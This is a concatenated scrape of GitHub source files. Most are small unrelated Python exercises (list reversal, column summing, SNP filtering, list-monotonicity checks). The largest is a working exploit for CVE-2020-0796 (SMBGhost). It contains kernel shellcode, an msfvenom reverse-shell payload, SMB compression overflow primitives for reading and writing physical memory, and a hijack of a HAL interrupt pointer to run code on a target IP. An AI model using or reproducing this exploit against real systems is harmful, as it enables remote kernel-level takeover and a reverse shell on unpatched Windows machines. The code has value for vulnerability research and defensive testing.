|
4c259478efd8d7d014d56542400d3444951ea97b
|
refs/heads/master
| 2020-06-14T12:11:41.237085
| 2019-07-31T11:16:14
| 2019-07-31T11:16:14
| 195,001,196
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 60
|
py
|
t=list(map(int,input().split()))
su=reversed(t)
print(*su)
|
[
"noreply@github.com"
] |
Aravindandeva.noreply@github.com
|
00db01141a6fe24c1993c1a67bc74eea2ca0085c
|
6cff51ebc9320575978b4994c8e962f98055dad6
|
/Python/addColumn.py
|
85a8cbc70fdb0fc27fbf319b1615a8027f657fca
|
[] |
no_license
|
GajanSoorian/Cplus_plus_Exercises
|
d7603d9ac5c1bc8aa3412594eaa5bb001e070857
|
f01b929d3d5071d64007ff010c02de07e999a0a6
|
refs/heads/master
| 2020-06-14T23:23:00.583463
| 2020-03-04T16:47:29
| 2020-03-04T16:47:29
| 195,153,540
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 118
|
py
|
total = 0
with open("inputFile") as f:
    for line in f:
        fields = line.split()
        total += int(fields[2])
print(total)
|
[
"gajan"
] |
gajan
|
016c37473a3491cfa4ed004a213d50967866ac40
|
cad07b56ba48e8769f91d9b5b05ff649a3eb9bcc
|
/oa.py
|
82a43e206edb74fd9b27da08255901def90642f1
|
[] |
no_license
|
wangqi504635/webSpider
|
705742b61c34bafccf9c209634801cd238638df8
|
ebf3076d27ed9024d6ee49f8cc1eca8225b51996
|
refs/heads/master
| 2021-01-10T01:33:37.268912
| 2015-12-18T02:15:26
| 2015-12-18T02:15:26
| 44,084,416
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 174
|
py
|
__author__ = 'wangqi'
# coding = utf-8
from selenium import webdriver
url = "http://oa:2004/NewOrder.aspx";
browser = webdriver.Firefox()
browser.back()
browser.get(url)
|
[
"wangqi504635@gmail.com"
] |
wangqi504635@gmail.com
|
9dd90e30d784cb7260b333f35539da47d64ee751
|
b4945edc408bdfc22050e305e12b3ac5425e4c07
|
/find_f2.py
|
0918f24ab2067e87716a937da58bbf1854c500fb
|
[] |
no_license
|
hilaryfinucane/ibd
|
ec691e31fa9f0c7137e4c1bcfc563364561ef386
|
54fdd48350280123687bfa3b6762d9d328fdd5e2
|
refs/heads/master
| 2020-12-24T18:32:23.258409
| 2016-05-20T03:38:51
| 2016-05-20T03:38:51
| 58,578,588
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
from __future__ import print_function
import numpy as np
from pysnptools.snpreader import Bed
data_dir = '/groups/price/hilary/ibd/data'
bedfile = data_dir+'/1000G.EUR.QC.22'
outfile = bedfile+'.f2snps'
bed = Bed(bedfile)
x = bed.read()
b = np.array([sum(x.val[:,i]) in [2,976] and 1 in x.val[:,i] for i in range(len(x.sid))])
f2snps = x.sid[b]
print('\n'.join(f2snps), file = open(outfile,'w'))
|
[
"hilaryfinucane@gmail.com"
] |
hilaryfinucane@gmail.com
|
8e14b94f7a26ca4103feb5dbec9ae3a8cc3fc5c3
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/176/usersdata/268/95705/submittedfiles/funcoes1.py
|
ebcc0baaf58cceb76e4bfbf2803dbbd5ece60cf7
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,912
|
py
|
# -*- coding: utf-8 -*-
def crescente (a):
    # write the code of the "crescente" (increasing) function here
cont=0
for i in range(1,len(a),1):
if (a[i]>a[i-1]):
cont=cont+1
else:
break
if cont==len(a)-1:
return(True)
else:
return(False)
# write the remaining functions
def decrescente (a):
cont=0
for i in range(1,len(a),1):
if (a[i]<a[i-1]):
cont=cont+1
else:
break
if cont==len(a)-1:
return(True)
else:
return(False)
def consecutivo (a):
cont=0
for i in range(1,len(a),1):
if (a[i]==a[i-1]):
break
else:
cont=cont+1
if cont==len(a)-1:
return(False)
else:
return(True)
# write the main program
n=int(input('Digite o numero de termos das listas: '))
a=[]
b=[]
c=[]
for i in range(0,n,1):
valor_a=int(input('Digite o termo de a : '))
a.append(valor_a)
for i in range(0,n,1):
valor_b=int(input('Digite o termo de b : '))
b.append(valor_b)
for i in range(0,n,1):
valor_c=int(input('Digite o termo de c : '))
c.append(valor_c)
if crescente(a)==True:
print('S')
if crescente(a)==False:
print('N')
if decrescente(a)==True:
print('S')
if decrescente(a)==False:
print('N')
if consecutivo(a)==True:
print('S')
if consecutivo(a)==False:
print('N')
if crescente(b)==True:
print('S')
if crescente(b)==False:
print('N')
if decrescente(b)==True:
print('S')
if decrescente(b)==False:
print('N')
if consecutivo(b)==True:
print('S')
if consecutivo(b)==False:
print('N')
if crescente(c)==True:
print('S')
if crescente(c)==False:
print('N')
if decrescente(c)==True:
print('S')
if decrescente(c)==False:
print('N')
if consecutivo(c)==True:
print('S')
if consecutivo(c)==False:
print('N')
print(a)
print(b)
print(c)
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
61bc500b0f35345aaa4638b3e4b0d5530638212a
|
2df240db11427f8f1ca0f76e93967268328501a1
|
/CVE-2020-0796/exploit.py
|
682c580809cafd4e46844018f9aaaf2d6f08ae3b
|
[] |
no_license
|
ww6453/CVE-POC
|
b4b3107a3b01eca571bce3f59d354accbb432e0a
|
b37ba70068dd4f1c391f9f125e80db5f9610488a
|
refs/heads/master
| 2023-03-24T04:03:48.224305
| 2021-03-23T02:51:56
| 2021-03-23T02:51:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19,831
|
py
|
#!/usr/bin/env python
import sys
import socket
import struct
import argparse
from lznt1 import compress, compress_evil
from smb_win import smb_negotiate, smb_compress
# Use lowstub jmp bytes to signature search
LOWSTUB_JMP = 0x1000600E9
# Offset of PML4 pointer in lowstub
PML4_LOWSTUB_OFFSET = 0xA0
# Offset of lowstub virtual address in lowstub
SELFVA_LOWSTUB_OFFSET = 0x78
# Offset of hal!HalpApicRequestInterrupt pointer in hal!HalpInterruptController
HALP_APIC_REQ_INTERRUPT_OFFSET = 0x78
KUSER_SHARED_DATA = 0xFFFFF78000000000
# Offset of pNetRawUSER_PAYLOADfer in SRVNET_USER_PAYLOADFER_HDR
PNET_RAW_USER_PAYLOADF_OFFSET = 0x18
# Offset of pMDL1 in SRVNET_USER_PAYLOADFER_HDR
PMDL1_OFFSET = 0x38
# Shellcode from kernel_shellcode.asm
KERNEL_SHELLCODE = b"\x41\x50\x41\x51\x41\x55\x41\x57\x41\x56\x51\x52\x53\x56\x57\x4C"
KERNEL_SHELLCODE += b"\x8D\x35\xB9\x02\x00\x00\x49\x8B\x86\xD8\x00\x00\x00\x49\x8B\x9E"
KERNEL_SHELLCODE += b"\xE0\x00\x00\x00\x48\x89\x18\xFB\x48\x31\xC9\x44\x0F\x22\xC1\xB9"
KERNEL_SHELLCODE += b"\x82\x00\x00\xC0\x0F\x32\x25\x00\xF0\xFF\xFF\x48\xC1\xE2\x20\x48"
KERNEL_SHELLCODE += b"\x01\xD0\x48\x2D\x00\x10\x00\x00\x66\x81\x38\x4D\x5A\x75\xF3\x49"
KERNEL_SHELLCODE += b"\x89\xC7\x4D\x89\x3E\xBF\x78\x7C\xF4\xDB\xE8\xE4\x00\x00\x00\x49"
KERNEL_SHELLCODE += b"\x89\xC5\xBF\x3F\x5F\x64\x77\xE8\x38\x01\x00\x00\x48\x89\xC1\xBF"
KERNEL_SHELLCODE += b"\xE1\x14\x01\x17\xE8\x2B\x01\x00\x00\x48\x89\xC2\x48\x83\xC2\x08"
KERNEL_SHELLCODE += b"\x49\x8D\x74\x0D\x00\xE8\x09\x01\x00\x00\x3D\xD8\x83\xE0\x3E\x74"
KERNEL_SHELLCODE += b"\x0A\x4D\x8B\x6C\x15\x00\x49\x29\xD5\xEB\xE5\xBF\x48\xB8\x18\xB8"
KERNEL_SHELLCODE += b"\x4C\x89\xE9\xE8\x9B\x00\x00\x00\x49\x89\x46\x08\x4D\x8B\x45\x30"
KERNEL_SHELLCODE += b"\x4D\x8B\x4D\x38\x49\x81\xE8\xF8\x02\x00\x00\x48\x31\xF6\x49\x81"
KERNEL_SHELLCODE += b"\xE9\xF8\x02\x00\x00\x41\x8B\x79\x74\x0F\xBA\xE7\x04\x73\x05\x4C"
KERNEL_SHELLCODE += b"\x89\xCE\xEB\x0C\x4D\x39\xC8\x4D\x8B\x89\x00\x03\x00\x00\x75\xDE"
KERNEL_SHELLCODE += b"\x48\x85\xF6\x74\x49\x49\x8D\x4E\x10\x48\x89\xF2\x4D\x31\xC0\x4C"
KERNEL_SHELLCODE += b"\x8D\x0D\xC2\x00\x00\x00\x52\x41\x50\x41\x50\x41\x50\xBF\xC4\x5C"
KERNEL_SHELLCODE += b"\x19\x6D\x48\x83\xEC\x20\xE8\x38\x00\x00\x00\x48\x83\xC4\x40\x49"
KERNEL_SHELLCODE += b"\x8D\x4E\x10\xBF\x34\x46\xCC\xAF\x48\x83\xEC\x20\xB8\x05\x00\x00"
KERNEL_SHELLCODE += b"\x00\x44\x0F\x22\xC0\xE8\x19\x00\x00\x00\x48\x83\xC4\x20\xFA\x48"
KERNEL_SHELLCODE += b"\x89\xD8\x5F\x5E\x5B\x5A\x59\x41\x5E\x41\x5F\x41\x5D\x41\x59\x41"
KERNEL_SHELLCODE += b"\x58\xFF\xE0\xE8\x02\x00\x00\x00\xFF\xE0\x53\x51\x56\x41\x8B\x47"
KERNEL_SHELLCODE += b"\x3C\x4C\x01\xF8\x8B\x80\x88\x00\x00\x00\x4C\x01\xF8\x50\x8B\x48"
KERNEL_SHELLCODE += b"\x18\x8B\x58\x20\x4C\x01\xFB\xFF\xC9\x8B\x34\x8B\x4C\x01\xFE\xE8"
KERNEL_SHELLCODE += b"\x1F\x00\x00\x00\x39\xF8\x75\xEF\x58\x8B\x58\x24\x4C\x01\xFB\x66"
KERNEL_SHELLCODE += b"\x8B\x0C\x4B\x8B\x58\x1C\x4C\x01\xFB\x8B\x04\x8B\x4C\x01\xF8\x5E"
KERNEL_SHELLCODE += b"\x59\x5B\xC3\x52\x31\xC0\x99\xAC\xC1\xCA\x0D\x01\xC2\x85\xC0\x75"
KERNEL_SHELLCODE += b"\xF6\x92\x5A\xC3\xE8\xA1\xFF\xFF\xFF\x80\x78\x02\x80\x77\x05\x0F"
KERNEL_SHELLCODE += b"\xB6\x40\x03\xC3\x8B\x40\x03\xC3\x41\x57\x41\x56\x57\x56\x48\x8B"
KERNEL_SHELLCODE += b"\x05\x12\x01\x00\x00\x48\x8B\x48\x18\x48\x8B\x49\x20\x48\x8B\x09"
KERNEL_SHELLCODE += b"\x66\x83\x79\x48\x18\x75\xF6\x48\x8B\x41\x50\x81\x78\x0C\x33\x00"
KERNEL_SHELLCODE += b"\x32\x00\x75\xE9\x4C\x8B\x79\x20\xBF\x5E\x51\x5E\x83\xE8\x58\xFF"
KERNEL_SHELLCODE += b"\xFF\xFF\x49\x89\xC6\x4C\x8B\x3D\xD3\x00\x00\x00\x31\xC0\x44\x0F"
KERNEL_SHELLCODE += b"\x22\xC0\x48\x8D\x15\x96\x01\x00\x00\x89\xC1\x48\xF7\xD1\x49\x89"
KERNEL_SHELLCODE += b"\xC0\xB0\x40\x50\xC1\xE0\x06\x50\x49\x89\x01\x48\x83\xEC\x20\xBF"
KERNEL_SHELLCODE += b"\xEA\x99\x6E\x57\xE8\x1A\xFF\xFF\xFF\x48\x83\xC4\x30\x48\x8B\x3D"
KERNEL_SHELLCODE += b"\x6B\x01\x00\x00\x48\x8D\x35\x77\x00\x00\x00\xB9\x1D\x00\x00\x00"
KERNEL_SHELLCODE += b"\xF3\xA4\x48\x8D\x35\x6E\x01\x00\x00\xB9\x58\x02\x00\x00\xF3\xA4"
KERNEL_SHELLCODE += b"\x48\x8D\x0D\xE0\x00\x00\x00\x65\x48\x8B\x14\x25\x88\x01\x00\x00"
KERNEL_SHELLCODE += b"\x4D\x31\xC0\x4C\x8D\x0D\x46\x00\x00\x00\x41\x50\x6A\x01\x48\x8B"
KERNEL_SHELLCODE += b"\x05\x2A\x01\x00\x00\x50\x41\x50\x48\x83\xEC\x20\xBF\xC4\x5C\x19"
KERNEL_SHELLCODE += b"\x6D\xE8\xBD\xFE\xFF\xFF\x48\x83\xC4\x40\x48\x8D\x0D\xA6\x00\x00"
KERNEL_SHELLCODE += b"\x00\x4C\x89\xF2\x4D\x31\xC9\xBF\x34\x46\xCC\xAF\x48\x83\xEC\x20"
KERNEL_SHELLCODE += b"\xE8\x9E\xFE\xFF\xFF\x48\x83\xC4\x20\x5E\x5F\x41\x5E\x41\x5F\xC3"
KERNEL_SHELLCODE += b"\x90\xC3\x48\x92\x31\xC9\x51\x51\x49\x89\xC9\x4C\x8D\x05\x0D\x00"
KERNEL_SHELLCODE += b"\x00\x00\x89\xCA\x48\x83\xEC\x20\xFF\xD0\x48\x83\xC4\x30\xC3\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x00"
KERNEL_SHELLCODE += b"\x00\x00\x00\x00\x00\x00\x00"
# Reverse shell generated by msfvenom. Can you believe I had to download Kali Linux for this shit?
USER_PAYLOAD = b""
USER_PAYLOAD += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xcc\x00\x00\x00"
USER_PAYLOAD += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b"
USER_PAYLOAD += b"\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
USER_PAYLOAD += b"\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
USER_PAYLOAD += b"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1"
USER_PAYLOAD += b"\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
USER_PAYLOAD += b"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00"
USER_PAYLOAD += b"\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48"
USER_PAYLOAD += b"\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0"
USER_PAYLOAD += b"\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d"
USER_PAYLOAD += b"\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1"
USER_PAYLOAD += b"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75"
USER_PAYLOAD += b"\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
USER_PAYLOAD += b"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48"
USER_PAYLOAD += b"\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
USER_PAYLOAD += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59"
USER_PAYLOAD += b"\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49\xbe\x77"
USER_PAYLOAD += b"\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48"
USER_PAYLOAD += b"\x81\xec\xa0\x01\x00\x00\x49\x89\xe5\x48\x31\xc0\x50"
USER_PAYLOAD += b"\x50\x49\xc7\xc4\x02\x00\x0d\x05\x41\x54\x49\x89\xe4"
USER_PAYLOAD += b"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89"
USER_PAYLOAD += b"\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00"
USER_PAYLOAD += b"\xff\xd5\x6a\x02\x59\x50\x50\x4d\x31\xc9\x4d\x31\xc0"
USER_PAYLOAD += b"\x48\xff\xc0\x48\x89\xc2\x41\xba\xea\x0f\xdf\xe0\xff"
USER_PAYLOAD += b"\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89"
USER_PAYLOAD += b"\xf9\x41\xba\xc2\xdb\x37\x67\xff\xd5\x48\x31\xd2\x48"
USER_PAYLOAD += b"\x89\xf9\x41\xba\xb7\xe9\x38\xff\xff\xd5\x4d\x31\xc0"
USER_PAYLOAD += b"\x48\x31\xd2\x48\x89\xf9\x41\xba\x74\xec\x3b\xe1\xff"
USER_PAYLOAD += b"\xd5\x48\x89\xf9\x48\x89\xc7\x41\xba\x75\x6e\x4d\x61"
USER_PAYLOAD += b"\xff\xd5\x48\x81\xc4\xb0\x02\x00\x00\x48\x83\xec\x10"
USER_PAYLOAD += b"\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58\x48\x89\xf9"
USER_PAYLOAD += b"\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x48\x83\xc4\x20\x5e"
USER_PAYLOAD += b"\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00\x41\x58"
USER_PAYLOAD += b"\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4\x53\xe5\xff"
USER_PAYLOAD += b"\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89\xf0"
USER_PAYLOAD += b"\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff"
USER_PAYLOAD += b"\xd5\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xe1\x41"
USER_PAYLOAD += b"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56"
USER_PAYLOAD += b"\xff\xd5"
PML4_SELFREF = 0
PHAL_HEAP = 0
PHALP_INTERRUPT = 0
PHALP_APIC_INTERRUPT = 0
PNT_ENTRY = 0
max_read_retry = 3
overflow_val = 0x1100
write_unit = 0xd0
pmdl_va = KUSER_SHARED_DATA + 0x900
pmdl_mapva = KUSER_SHARED_DATA + 0x800
pshellcodeva = KUSER_SHARED_DATA + 0x950
class MDL:
def __init__(self, map_va, phys_addr):
self.next = struct.pack("<Q", 0x0)
self.size = struct.pack("<H", 0x40)
self.mdl_flags = struct.pack("<H", 0x5004)
self.alloc_processor = struct.pack("<H", 0x0)
self.reserved = struct.pack("<H", 0x0)
self.process = struct.pack("<Q", 0x0)
self.map_va = struct.pack("<Q", map_va)
map_va &= ~0xFFF
self.start_va = struct.pack("<Q", map_va)
self.byte_count = struct.pack("<L", 0x1100)
self.byte_offset = struct.pack("<L", (phys_addr & 0xFFF) + 0x4)
phys_addr_enc = (phys_addr & 0xFFFFFFFFFFFFF000) >> 12
self.phys_addr1 = struct.pack("<Q", phys_addr_enc)
self.phys_addr2 = struct.pack("<Q", phys_addr_enc)
self.phys_addr3 = struct.pack("<Q", phys_addr_enc)
def raw_bytes(self):
mdl_bytes = self.next + self.size + self.mdl_flags + \
self.alloc_processor + self.reserved + self.process + \
self.map_va + self.start_va + self.byte_count + \
self.byte_offset + self.phys_addr1 + self.phys_addr2 + \
self.phys_addr3
return mdl_bytes
def reconnect(ip, port):
sock = socket.socket(socket.AF_INET)
sock.settimeout(7)
sock.connect((ip, port))
return sock
def write_primitive(ip, port, data, addr):
sock = reconnect(ip, port)
smb_negotiate(sock)
sock.recv(1000)
uncompressed_data = b"\x41"*(overflow_val - len(data))
uncompressed_data += b"\x00"*PNET_RAW_USER_PAYLOADF_OFFSET
uncompressed_data += struct.pack('<Q', addr)
compressed_data = compress(uncompressed_data)
smb_compress(sock, compressed_data, 0xFFFFFFFF, data)
sock.close()
def write_srvnet_USER_PAYLOADfer_hdr(ip, port, data, offset):
sock = reconnect(ip, port)
smb_negotiate(sock)
sock.recv(1000)
compressed_data = compress_evil(data)
dummy_data = b"\x33"*(overflow_val + offset)
smb_compress(sock, compressed_data, 0xFFFFEFFF, dummy_data)
sock.close()
def read_physmem_primitive(ip, port, phys_addr):
i = 0
while i < max_read_retry:
i += 1
USER_PAYLOADf = try_read_physmem_primitive(ip, port, phys_addr)
if USER_PAYLOADf is not None:
return USER_PAYLOADf
def try_read_physmem_primitive(ip, port, phys_addr):
fake_mdl = MDL(pmdl_mapva, phys_addr).raw_bytes()
write_primitive(ip, port, fake_mdl, pmdl_va)
write_srvnet_USER_PAYLOADfer_hdr(ip, port, struct.pack('<Q', pmdl_va), PMDL1_OFFSET)
i = 0
while i < max_read_retry:
i += 1
sock = reconnect(ip, port)
smb_negotiate(sock)
USER_PAYLOADf = sock.recv(1000)
sock.close()
if USER_PAYLOADf[4:8] != b"\xfeSMB":
return USER_PAYLOADf
def get_phys_addr(ip, port, va_addr):
pml4_index = (((1 << 9) - 1) & (va_addr >> (40 - 1)))
pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1)))
pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1)))
pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1)))
pml4e = PML4 + pml4_index*0x8
pdpt_USER_PAYLOADf = read_physmem_primitive(ip, port, pml4e)
if pdpt_USER_PAYLOADf is None:
sys.exit("[-] physical read primitive failed")
pdpt = struct.unpack("<Q", pdpt_USER_PAYLOADf[0:8])[0] & 0xFFFFF000
pdpte = pdpt + pdpt_index*0x8
pdt_USER_PAYLOADf = read_physmem_primitive(ip, port, pdpte)
if pdt_USER_PAYLOADf is None:
sys.exit("[-] physical read primitive failed")
pdt = struct.unpack("<Q", pdt_USER_PAYLOADf[0:8])[0] & 0xFFFFF000
pdte = pdt + pdt_index*0x8
pt_USER_PAYLOADf = read_physmem_primitive(ip, port, pdte)
if pt_USER_PAYLOADf is None:
sys.exit("[-] physical read primitive failed")
pt = struct.unpack("<Q", pt_USER_PAYLOADf[0:8])[0]
if pt & (1 << (8 - 1)):
phys_addr = (pt & 0xFFFFF000) + (pt_index & 0xFFF)*0x1000 + (va_addr & 0xFFF)
return phys_addr
else:
pt = pt & 0xFFFFF000
pte = pt + pt_index*0x8
pte_USER_PAYLOADf = read_physmem_primitive(ip, port, pte)
if pte_USER_PAYLOADf is None:
sys.exit("[-] physical read primitive failed")
phys_addr = (struct.unpack("<Q", pte_USER_PAYLOADf[0:8])[0] & 0xFFFFF000) + \
(va_addr & 0xFFF)
return phys_addr
def get_pte_va(addr):
pt = addr >> 9
lb = (0xFFFF << 48) | (PML4_SELFREF << 39)
ub = ((0xFFFF << 48) | (PML4_SELFREF << 39) +
0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8
pt = pt | lb
pt = pt & ub
return pt
def overwrite_pte(ip, port, addr):
phys_addr = get_phys_addr(ip, port, addr)
USER_PAYLOADf = read_physmem_primitive(ip, port, phys_addr)
if USER_PAYLOADf is None:
sys.exit("[-] read primitive failed!")
pte_val = struct.unpack("<Q", USER_PAYLOADf[0:8])[0]
# Clear NX bit
overwrite_val = pte_val & (((1 << 63) - 1))
overwrite_USER_PAYLOADf = struct.pack("<Q", overwrite_val)
write_primitive(ip, port, overwrite_USER_PAYLOADf, addr)
def build_shellcode():
global KERNEL_SHELLCODE
KERNEL_SHELLCODE += struct.pack("<Q", PHALP_INTERRUPT +
HALP_APIC_REQ_INTERRUPT_OFFSET)
KERNEL_SHELLCODE += struct.pack("<Q", PHALP_APIC_INTERRUPT)
KERNEL_SHELLCODE += USER_PAYLOAD
def search_hal_heap(ip, port):
global PHALP_INTERRUPT
global PHALP_APIC_INTERRUPT
search_len = 0x10000
index = PHAL_HEAP
page_index = PHAL_HEAP
cons = 0
phys_addr = 0
while index < PHAL_HEAP + search_len:
# It seems that pages in the HAL heap are not necessarily contiguous in physical memory,
# so we try to reduce number of reads like this
if not (index & 0xFFF):
phys_addr = get_phys_addr(ip, port, index)
else:
phys_addr = (phys_addr & 0xFFFFFFFFFFFFF000) + (index & 0xFFF)
USER_PAYLOADf = read_physmem_primitive(ip, port, phys_addr)
if USER_PAYLOADf is None:
sys.exit("[-] physical read primitive failed!")
entry_indices = 8*(((len(USER_PAYLOADf) + 8 // 2) // 8) - 1)
i = 0
# This heuristic seems to be OK to find HalpInterruptController, but could use improvement
while i < entry_indices:
entry = struct.unpack("<Q", USER_PAYLOADf[i:i+8])[0]
i += 8
if (entry & 0xFFFFFF0000000000) != 0xFFFFF80000000000:
cons = 0
continue
cons += 1
if cons > 3:
PHALP_INTERRUPT = index + i - 0x40
print("[+] found HalpInterruptController at %lx"
% PHALP_INTERRUPT)
if len(USER_PAYLOADf) < i + 0x40:
USER_PAYLOADf = read_physmem_primitive(ip, port, phys_addr + i + 0x38)
PHALP_APIC_INTERRUPT = struct.unpack("<Q", USER_PAYLOADf[0:8])[0]
if USER_PAYLOADf is None:
sys.exit("[-] physical read primitive failed!")
else:
PHALP_APIC_INTERRUPT = struct.unpack("<Q",USER_PAYLOADf[i + 0x38:i+0x40])[0]
print("[+] found HalpApicRequestInterrupt at %lx" % PHALP_APIC_INTERRUPT)
return
index += entry_indices
sys.exit("[-] failed to find HalpInterruptController!")
def search_selfref(ip, port):
search_len = 0x1000
index = PML4
while search_len:
USER_PAYLOADf = read_physmem_primitive(ip, port, index)
if USER_PAYLOADf is None:
return
entry_indices = 8*(((len(USER_PAYLOADf) + 8 // 2) // 8) - 1)
i = 0
while i < entry_indices:
entry = struct.unpack("<Q",USER_PAYLOADf[i:i+8])[0] & 0xFFFFF000
if entry == PML4:
return index + i
i += 8
search_len -= entry_indices
index += entry_indices
def find_pml4_selfref(ip, port):
global PML4_SELFREF
self_ref = search_selfref(ip, port)
if self_ref is None:
sys.exit("[-] failed to find PML4 self reference entry!")
PML4_SELFREF = (self_ref & 0xFFF) >> 3
print("[+] found PML4 self-ref entry %0x" % PML4_SELFREF)
def find_low_stub(ip, port):
global PML4
global PHAL_HEAP
limit = 0x100000
index = 0x1000
while index < limit:
USER_PAYLOADf = read_physmem_primitive(ip, port, index)
if USER_PAYLOADf is None:
sys.exit("[-] physical read primitive failed!")
entry = struct.unpack("<Q", USER_PAYLOADf[0:8])[0] & 0xFFFFFFFFFFFF00FF
if entry == LOWSTUB_JMP:
print("[+] found low stub at phys addr %lx!" % index)
PML4 = struct.unpack("<Q", USER_PAYLOADf[PML4_LOWSTUB_OFFSET: PML4_LOWSTUB_OFFSET + 8])[0]
print("[+] PML4 at %lx" % PML4)
PHAL_HEAP = struct.unpack("<Q", USER_PAYLOADf[SELFVA_LOWSTUB_OFFSET:SELFVA_LOWSTUB_OFFSET + 8])[0] & 0xFFFFFFFFF0000000
print("[+] base of HAL heap at %lx" % PHAL_HEAP)
return
index += 0x1000
sys.exit("[-] Failed to find low stub in physical memory!")
def do_rce(ip, port):
find_low_stub(ip, port)
find_pml4_selfref(ip, port)
search_hal_heap(ip, port)
build_shellcode()
print("[+] built shellcode!")
pKernelUserSharedPTE = get_pte_va(KUSER_SHARED_DATA)
print("[+] KUSER_SHARED_DATA PTE at %lx" % pKernelUserSharedPTE)
overwrite_pte(ip, port, pKernelUserSharedPTE)
print("[+] KUSER_SHARED_DATA PTE NX bit cleared!")
# TODO: figure out why we can't write the entire shellcode data at once. There is a check before srv2!Srv2DecompressData preventing the call of the function.
to_write = len(KERNEL_SHELLCODE)
write_bytes = 0
while write_bytes < to_write:
write_sz = min([write_unit, to_write - write_bytes])
write_primitive(ip, port, KERNEL_SHELLCODE[write_bytes:write_bytes + write_sz], pshellcodeva + write_bytes)
write_bytes += write_sz
print("[+] Wrote shellcode at %lx!" % pshellcodeva)
input("[+] Press a key to execute shellcode!")
write_primitive(ip, port, struct.pack("<Q", pshellcodeva), PHALP_INTERRUPT + HALP_APIC_REQ_INTERRUPT_OFFSET)
print("[+] overwrote HalpInterruptController pointer, should have execution shortly...")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-ip", help="IP address of target", required=True)
parser.add_argument("-p", "--port", default=445, help="SMB port, \
default: 445", required=False, type=int)
args = parser.parse_args()
